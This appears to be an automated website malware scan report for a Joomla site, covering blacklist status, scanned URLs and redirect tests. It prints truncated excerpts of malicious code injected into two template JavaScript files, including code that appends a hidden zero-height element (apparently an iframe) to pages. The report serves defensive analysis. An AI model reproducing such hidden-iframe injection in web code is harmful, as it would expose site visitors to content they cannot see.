Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yobeburo.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yobeburo.com/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.yobeburo.com/ | 200 OK Content-Length: 13281 Content-Type: text/html | clean |
http://www.yobeburo.com/templates/ja_olyra/scripts/ja.script.js | 200 OK Content-Length: 17285 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var currentFontSize = 4; function revertStyles(fontsize){ currentFontSize = fontsize; changeFontSize(0); } function changeFontSize(sizeDifference){ var rule = getRuleByName("body.fs" + (currentFontSize + sizeDifference)); if (rule){ document.body.style.fontSize = rule.style.fontSize; currentFontSize = currentFontSize + sizeDifference; createCookie("FontSize", currentFontSize, 365); equalHeightInit(); } return; }; function [… truncated in the report …] if(f)e(s);}
Decoded script:
function equalHeightInit() { var topslleft = document.getElementById("ja-topsl-leftwrap"); var topslleftw2 = getElementsByClass("wrap2", topslleft, "DIV"); var topslleftw3 = getElementsByClass("wrap3", topslleft, "DIV"); if (!topslleft || !topslleftw2 || !topslleftw3) { return; } var lh = topslleftw3[0].offsetHeight + 39; var topslright = document.getElementById("ja-topsl-right"); var topslrightm = getElementsByClas [… truncated in the report …] ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see [… truncated in the report …]
Note: the decoded excerpt appends an element named ifrm (presumably an iframe) to the page body with zero height and hidden visibility, so whatever it loads is invisible to the visitor; the element's source URL is not part of this excerpt. The last statements update the state of a seeded pseudo-random generator, whose use is not shown here.
Antivirus reports:
http://www.yobeburo.com/templates/ja_olyra/ja_iconmenu/ja.iconmenu.js | 200 OK Content-Length: 8278 Content-Type: application/javascript | malicious |
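Malicious code - confirmed by antiviruses (see below):
var title; var arr_img; function iconmenu_over(imgid){ curr_img=imgid; showtitle(imgid); } function iconmenu_out(imgid){ curr_img=0; hidetitle(imgid); } function showtitle(imgid) { var imageElem=arr_img[imgid]; title.innerHTML = imageElem.alt; left = Math.floor((icon_small-title.offsetWidth)/2) + icon_small * (curr_img-1) + icon_padding * 2 * (curr_img-1); title.style.left = left + "px"; } function hidetitle () { ti [… truncated in the report …] if(f)e(s);}
Note: this excerpt ends with the same `if(f)e(s);}` tail as the ja.script.js excerpt in the row above, which is consistent with the same code having been appended to both template scripts. Both files should be compared against a known-good copy of the template, since cleaning only one would leave the injection in place.
Antivirus reports: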
http://www.yobeburo.com/index.php?option=com_frontpage&Itemid=1 | 200 OK Content-Length: 13410 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=view&id=5&Itemid=6 | 200 OK Content-Length: 13491 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=view&id=12&Itemid=29 | 200 OK Content-Length: 13497 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=view&id=13&Itemid=30 | 200 OK Content-Length: 13497 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_contact&Itemid=3 | 200 OK Content-Length: 157 Content-Type: text/html | clean |
http://www.yobeburo.com/test404page.js | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php | 200 OK Content-Length: 13308 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_content&task=section&id=1&Itemid=2 | 200 OK Content-Length: 13298 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_weblinks&Itemid=23 | 200 OK Content-Length: 14087 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_weblinks&catid=2&Itemid=23 | 200 OK Content-Length: 17104 Content-Type: text/html | clean |
http://www.yobeburo.com/index.php?option=com_weblinks&task=view&catid=2&id=1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 04:36:23 GMT Location: http://www.joomla.org Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_bwlimited/1.4 Content-Length: 0 Content-Type: text/html Set-Cookie: c1e6d9ad49aab74db88c6d4fa73f1f7e=-; path=/ X-Powered-By: PHP/5.3.24 | clean |
http://www.joomla.org/ | 200 OK Content-Length: 30525 Content-Type: text/html | clean |
http://www.joomla.org/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yobeburo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: yobeburo.com
Referer: http://www.google.com/search?q=yobeburo.com
Result:
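The result is similar to the first query. There are no suspicious redirects found. Only these two request profiles (no Referer, and a Google search Referer) were tested, so this does not rule out redirects that depend on other request attributes.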